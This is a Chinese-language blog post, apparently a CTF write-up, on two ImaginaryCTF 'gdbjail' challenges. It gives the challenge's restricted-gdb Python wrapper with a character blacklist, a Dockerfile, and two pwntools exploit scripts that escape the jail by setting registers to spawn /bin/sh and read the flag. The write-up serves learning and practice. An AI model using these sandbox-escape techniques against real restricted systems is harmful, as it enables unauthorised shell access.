<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>gdbjail | nyyyddddn</title>
  <meta name="author" content="nyyyddddn">
  
  <meta name="description" content="题目附件https://github.com/nyyyddddn/ctf/tree/main/gdbjail
最近在ImaginaryCTF看到两个关于gdbjail的题目，觉得挺有意思的，远程提供了一个受限的gdb调试环境，限制交互的时候使用的命令，目的是利用限制的命令去实现getshell，或者是将flag读出来。
没用过没装插件的gdb，不装插件挺难用的
gdbjail1run.sh
#!/bin/bash

gdb -x /home/user/gdbinit

gdbinit
source &amp;#x2F;home&amp;#x2F;user&amp;#x2F;main.py

main.py
import gdb

def main():
    gdb.execute(&#34;file /bin/cat&#34;)
    gdb.execute(&#34;break read&#34;)
    gdb.execute(&#34;run&#34;)

    while True:
        try:
            command = input(&#34;(gdb) &#34;)
            if command.strip().startswith(&#34;break&#34;) or command.strip().startswith(&#34;set&#34;) or command.strip().startswith(&#34;continue&#34;):
                try:
                    gdb.execute(command)
                except gdb.error as e:
                    print(f&#34;Error executing command &#39;&amp;#123;command&amp;#125;&#39;: &amp;#123;e&amp;#125;&#34;)
            else:
                print(&#34;Only &#39;break&#39;, &#39;set&#39;, and &#39;continue&#39; commands are allowed.&#34;)
        except:
            pass

if __name__ == &#34;__main__&#34;:
    main()"> 
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="gdbjail"/>
  <meta property="og:site_name" content="nyyyddddn"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/atom.xml" title="nyyyddddn" type="application/atom+xml">
  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  




<meta name="generator" content="Hexo 6.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">nyyyddddn</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class=""></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class=""></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/catergories" title="All the categories.">
			  <i class=""></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class=""></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/atom.xml" title="Subscribe me.">
			  <i class=""></i>RSS
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> gdbjail</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  		

	  <p>题目附件<a target="_blank" rel="noopener" href="https://github.com/nyyyddddn/ctf/tree/main/gdbjail">https://github.com/nyyyddddn/ctf/tree/main/gdbjail</a></p>
<p>最近在ImaginaryCTF看到两个关于gdbjail的题目，觉得挺有意思的，远程提供了一个受限的gdb调试环境，限制交互的时候使用的命令，目的是利用限制的命令去实现getshell，或者是将flag读出来。</p>
<p>没用过没装插件的gdb，不装插件挺难用的</p>
<h1 id="gdbjail1"><a href="#gdbjail1" class="headerlink" title="gdbjail1"></a>gdbjail1</h1><p>run.sh</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token shebang important">#!/bin/bash</span>

gdb <span class="token parameter variable">-x</span> /home/user/gdbinit<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>gdbinit</p>
<pre class="line-numbers language-none"><code class="language-none">source &#x2F;home&#x2F;user&#x2F;main.py<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>main.py</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> gdb

<span class="token keyword">def</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    gdb<span class="token punctuation">.</span>execute<span class="token punctuation">(</span><span class="token string">"file /bin/cat"</span><span class="token punctuation">)</span>
    gdb<span class="token punctuation">.</span>execute<span class="token punctuation">(</span><span class="token string">"break read"</span><span class="token punctuation">)</span>
    gdb<span class="token punctuation">.</span>execute<span class="token punctuation">(</span><span class="token string">"run"</span><span class="token punctuation">)</span>

    <span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
        <span class="token keyword">try</span><span class="token punctuation">:</span>
            command <span class="token operator">=</span> <span class="token builtin">input</span><span class="token punctuation">(</span><span class="token string">"(gdb) "</span><span class="token punctuation">)</span>
            <span class="token keyword">if</span> command<span class="token punctuation">.</span>strip<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>startswith<span class="token punctuation">(</span><span class="token string">"break"</span><span class="token punctuation">)</span> <span class="token keyword">or</span> command<span class="token punctuation">.</span>strip<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>startswith<span class="token punctuation">(</span><span class="token string">"set"</span><span class="token punctuation">)</span> <span class="token keyword">or</span> command<span class="token punctuation">.</span>strip<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>startswith<span class="token punctuation">(</span><span class="token string">"continue"</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
                <span class="token keyword">try</span><span class="token punctuation">:</span>
                    gdb<span class="token punctuation">.</span>execute<span class="token punctuation">(</span>command<span class="token punctuation">)</span>
                <span class="token keyword">except</span> gdb<span class="token punctuation">.</span>error <span class="token keyword">as</span> e<span class="token punctuation">:</span>
                    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"Error executing command '</span><span class="token interpolation"><span class="token punctuation">&#123;</span>command<span class="token punctuation">&#125;</span></span><span class="token string">': </span><span class="token interpolation"><span class="token punctuation">&#123;</span>e<span class="token punctuation">&#125;</span></span><span class="token string">"</span></span><span class="token punctuation">)</span>
            <span class="token keyword">else</span><span class="token punctuation">:</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"Only 'break', 'set', and 'continue' commands are allowed."</span><span class="token punctuation">)</span>
        <span class="token keyword">except</span><span class="token punctuation">:</span>
            <span class="token keyword">pass</span>

<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">"__main__"</span><span class="token punctuation">:</span>
    main<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<img src="/2024/09/02/gdbjail/1725253616707.png" class="" width="1725253616707">

<p>通过阅读官方文档，可以发现set可以对表达式进行赋值，通过set可以写内存或者是修改寄存器，main.py中，在read func打了一个断点，也就是说RIP寄存器是一个libc的地址，可以通过docker中提取出来的libc read符号的差值算出libc_base和binsh的地址，将rdi寄存器修改成binsh字符串的地址，将pc寄存器修改成libc_base的地址就可以getshell</p>
<p>exp</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>

libc <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">"./libc.so.6"</span><span class="token punctuation">)</span>
p <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token string">"127.0.0.1"</span><span class="token punctuation">,</span> <span class="token number">9999</span><span class="token punctuation">)</span>


p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"set $rdi=$rip-</span><span class="token interpolation"><span class="token punctuation">&#123;</span>libc<span class="token punctuation">.</span>sym<span class="token punctuation">[</span><span class="token string">'read'</span><span class="token punctuation">]</span><span class="token punctuation">&#125;</span></span><span class="token string">"</span></span><span class="token punctuation">)</span> <span class="token comment"># rdi = libc_base</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"set $rdi=$rdi+</span><span class="token interpolation"><span class="token punctuation">&#123;</span><span class="token builtin">next</span><span class="token punctuation">(</span>libc<span class="token punctuation">.</span>search<span class="token punctuation">(</span><span class="token string">b'/bin/sh'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#125;</span></span><span class="token string">"</span></span><span class="token punctuation">)</span> <span class="token comment"># rdi = binsh_addr</span>

p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"set $rip=$rip-</span><span class="token interpolation"><span class="token punctuation">&#123;</span>libc<span class="token punctuation">.</span>sym<span class="token punctuation">[</span><span class="token string">'read'</span><span class="token punctuation">]</span><span class="token punctuation">&#125;</span></span><span class="token string">"</span></span><span class="token punctuation">)</span> <span class="token comment"># pc = libc_base</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"set $rip=$rip+</span><span class="token interpolation"><span class="token punctuation">&#123;</span>libc<span class="token punctuation">.</span>sym<span class="token punctuation">[</span><span class="token string">'system'</span><span class="token punctuation">]</span><span class="token punctuation">&#125;</span></span><span class="token string">"</span></span><span class="token punctuation">)</span> <span class="token comment"># pc = system_func</span>

<span class="token comment"># exec system("/bin/sh")</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">b"continue"</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h1 id="gdbjail2"><a href="#gdbjail2" class="headerlink" title="gdbjail2"></a>gdbjail2</h1><p>和gdbjail1 不同的地方是，flag文件名是随机的</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token comment"># Copyright 2020 Google LLC</span>
<span class="token comment">#</span>
<span class="token comment"># Licensed under the Apache License, Version 2.0 (the "License");</span>
<span class="token comment"># you may not use this file except in compliance with the License.</span>
<span class="token comment"># You may obtain a copy of the License at</span>
<span class="token comment">#</span>
<span class="token comment">#     https://www.apache.org/licenses/LICENSE-2.0</span>
<span class="token comment">#</span>
<span class="token comment"># Unless required by applicable law or agreed to in writing, software</span>
<span class="token comment"># distributed under the License is distributed on an "AS IS" BASIS,</span>
<span class="token comment"># WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.</span>
<span class="token comment"># See the License for the specific language governing permissions and</span>
<span class="token comment"># limitations under the License.</span>
FROM ubuntu:22.04@sha256:ac58ff7fe25edc58bdf0067ca99df00014dbd032e2246d30a722fa348fd799a5 as <span class="token function">chroot</span>

RUN /usr/sbin/useradd --no-create-home <span class="token parameter variable">-u</span> <span class="token number">1000</span> user

RUN <span class="token assign-left variable">DEBIAN_FRONTEND</span><span class="token operator">=</span>noninteractive <span class="token function">apt-get</span> <span class="token parameter variable">-y</span> update
RUN <span class="token assign-left variable">DEBIAN_FRONTEND</span><span class="token operator">=</span>noninteractive <span class="token function">apt-get</span> <span class="token parameter variable">-y</span> <span class="token function">install</span> gdb python3

COPY flag.txt /home/user/flag.txt
RUN <span class="token function">mv</span> /home/user/flag.txt /home/user/<span class="token variable"><span class="token variable">`</span><span class="token function">tr</span> <span class="token parameter variable">-dc</span> A-Za-z0-9 <span class="token operator">&lt;</span> /dev/urandom <span class="token operator">|</span> <span class="token function">head</span> <span class="token parameter variable">-c</span> <span class="token number">20</span><span class="token variable">`</span></span>.txt
COPY run.sh /home/user/chal
COPY gdbinit.sh /home/user/gdbinit
COPY main.py /home/user/main.py
RUN <span class="token function">chmod</span> <span class="token number">555</span> /home/user/chal

FROM gcr.io/kctf-docker/challenge@sha256:d884e54146b71baf91603d5b73e563eaffc5a42d494b1e32341a5f76363060fb

COPY <span class="token parameter variable">--from</span><span class="token operator">=</span>chroot / /chroot

COPY nsjail.cfg /home/user/

CMD kctf_setup <span class="token operator">&amp;&amp;</span> <span class="token punctuation">\</span>
    kctf_drop_privs <span class="token punctuation">\</span>
    socat <span class="token punctuation">\</span>
      TCP-LISTEN:1337,reuseaddr,fork <span class="token punctuation">\</span>
      EXEC:<span class="token string">"kctf_pow nsjail --config /home/user/nsjail.cfg -- /home/user/chal"</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>以及多了一个blacklist，使用set去写内存需要指定写的数据宽度，()被禁用了导致不能用set去写内存，只能修改寄存器，同时因为p被禁用了，不能直接修改RIP寄存器</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> gdb

blacklist <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">"p"</span><span class="token punctuation">,</span> <span class="token string">"-"</span><span class="token punctuation">,</span> <span class="token string">"&amp;"</span><span class="token punctuation">,</span> <span class="token string">"("</span><span class="token punctuation">,</span> <span class="token string">")"</span><span class="token punctuation">,</span> <span class="token string">"["</span><span class="token punctuation">,</span> <span class="token string">"]"</span><span class="token punctuation">,</span> <span class="token string">"&#123;"</span><span class="token punctuation">,</span> <span class="token string">"&#125;"</span><span class="token punctuation">,</span> <span class="token string">"0x"</span><span class="token punctuation">]</span>

<span class="token keyword">def</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    gdb<span class="token punctuation">.</span>execute<span class="token punctuation">(</span><span class="token string">"file /bin/cat"</span><span class="token punctuation">)</span>
    gdb<span class="token punctuation">.</span>execute<span class="token punctuation">(</span><span class="token string">"break read"</span><span class="token punctuation">)</span>
    gdb<span class="token punctuation">.</span>execute<span class="token punctuation">(</span><span class="token string">"run"</span><span class="token punctuation">)</span>

    <span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>
        <span class="token keyword">try</span><span class="token punctuation">:</span>
            command <span class="token operator">=</span> <span class="token builtin">input</span><span class="token punctuation">(</span><span class="token string">"(gdb) "</span><span class="token punctuation">)</span>
            <span class="token keyword">if</span> <span class="token builtin">any</span><span class="token punctuation">(</span><span class="token punctuation">[</span>word <span class="token keyword">in</span> command <span class="token keyword">for</span> word <span class="token keyword">in</span> blacklist<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"Banned word detected!"</span><span class="token punctuation">)</span>
                <span class="token keyword">continue</span>
            <span class="token keyword">if</span> command<span class="token punctuation">.</span>strip<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>startswith<span class="token punctuation">(</span><span class="token string">"break"</span><span class="token punctuation">)</span> <span class="token keyword">or</span> command<span class="token punctuation">.</span>strip<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>startswith<span class="token punctuation">(</span><span class="token string">"set"</span><span class="token punctuation">)</span> <span class="token keyword">or</span> command<span class="token punctuation">.</span>strip<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>startswith<span class="token punctuation">(</span><span class="token string">"continue"</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
                <span class="token keyword">try</span><span class="token punctuation">:</span>
                    gdb<span class="token punctuation">.</span>execute<span class="token punctuation">(</span>command<span class="token punctuation">)</span>
                <span class="token keyword">except</span> gdb<span class="token punctuation">.</span>error <span class="token keyword">as</span> e<span class="token punctuation">:</span>
                    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"Error executing command '</span><span class="token interpolation"><span class="token punctuation">&#123;</span>command<span class="token punctuation">&#125;</span></span><span class="token string">': </span><span class="token interpolation"><span class="token punctuation">&#123;</span>e<span class="token punctuation">&#125;</span></span><span class="token string">"</span></span><span class="token punctuation">)</span>
            <span class="token keyword">else</span><span class="token punctuation">:</span>
                <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"Only 'break', 'set', and 'continue' commands are allowed."</span><span class="token punctuation">)</span>
        <span class="token keyword">except</span><span class="token punctuation">:</span>
            <span class="token keyword">pass</span>

<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">"__main__"</span><span class="token punctuation">:</span>
    main<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>getshell的思路很简单，&#x2F;bin&#x2F;cat 一定会调用glibc中的read函数，然后read函数封装了read syscall，所以一定有一个syscall instruction的片段，在read的syscall instruction中断下来，然后通过修改rax为 0x3b rdi为 binsh ,rsi为 0 rdx 为0 去调用execve(“&#x2F;bin&#x2F;sh”,0,0) getshell</p>
<img src="/2024/09/02/gdbjail/1725260923323.png" class="" width="1725260923323">

<pre class="line-numbers language-c" data-language="c"><code class="language-c">from pwn import <span class="token operator">*</span>

libc <span class="token operator">=</span> <span class="token function">ELF</span><span class="token punctuation">(</span><span class="token string">"./libc.so.6"</span><span class="token punctuation">)</span>
p <span class="token operator">=</span> <span class="token function">remote</span><span class="token punctuation">(</span><span class="token string">"127.0.0.1"</span><span class="token punctuation">,</span> <span class="token number">9999</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span><span class="token function">sendlineafter</span><span class="token punctuation">(</span>b<span class="token string">"(gdb) "</span><span class="token punctuation">,</span><span class="token string">"break *read+16"</span><span class="token punctuation">)</span> # read_func syscall
p<span class="token punctuation">.</span><span class="token function">sendlineafter</span><span class="token punctuation">(</span>b<span class="token string">"(gdb) "</span><span class="token punctuation">,</span><span class="token string">"continue"</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span><span class="token function">sendlineafter</span><span class="token punctuation">(</span>b<span class="token string">"(gdb) "</span><span class="token punctuation">,</span><span class="token string">"set $rax=59"</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span><span class="token function">sendlineafter</span><span class="token punctuation">(</span>b<span class="token string">"(gdb) "</span><span class="token punctuation">,</span> <span class="token char">'set $rdi=\"/bin/sh\"'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span><span class="token function">sendlineafter</span><span class="token punctuation">(</span>b<span class="token string">"(gdb) "</span><span class="token punctuation">,</span><span class="token string">"set $rsi=0"</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span><span class="token function">sendlineafter</span><span class="token punctuation">(</span>b<span class="token string">"(gdb) "</span><span class="token punctuation">,</span><span class="token string">"set $rdx=0"</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span><span class="token function">sendlineafter</span><span class="token punctuation">(</span>b<span class="token string">"(gdb) "</span><span class="token punctuation">,</span><span class="token string">"continue"</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span><span class="token function">sendlineafter</span><span class="token punctuation">(</span>b<span class="token string">"(gdb) "</span><span class="token punctuation">,</span><span class="token string">"continue"</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span><span class="token function">sendlineafter</span><span class="token punctuation">(</span>b<span class="token string">"(gdb) "</span><span class="token punctuation">,</span><span class="token string">"continue"</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span><span class="token function">sendline</span><span class="token punctuation">(</span><span class="token string">"cat *.txt"</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span><span class="token function">interactive</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>


	  <div class="article-footer-copyright">
	Ciallo～(∠・ω< )⌒★
</div>

	</div>

	
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a href="/2024/09/04/羊城杯2024pwn/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2024/08/31/nss3rd出题-Iterator-Trap解题思路/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
	
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2024-09-02 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/misc/">misc<span>9</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/ctf-writeup/">ctf writeup<span>52</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#gdbjail1"><span class="toc-article-text">gdbjail1</span></a></li><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#gdbjail2"><span class="toc-article-text">gdbjail2</span></a></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2025 nyyyddddn's Blog
  
      powered by <a href="http://hexo.io/" target="_blank">Hexo</a>.Theme <a href="https://github.com/Ares-X/hexo-theme-freemind.bithack" target="_blank">freemind.bithack</a>  
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
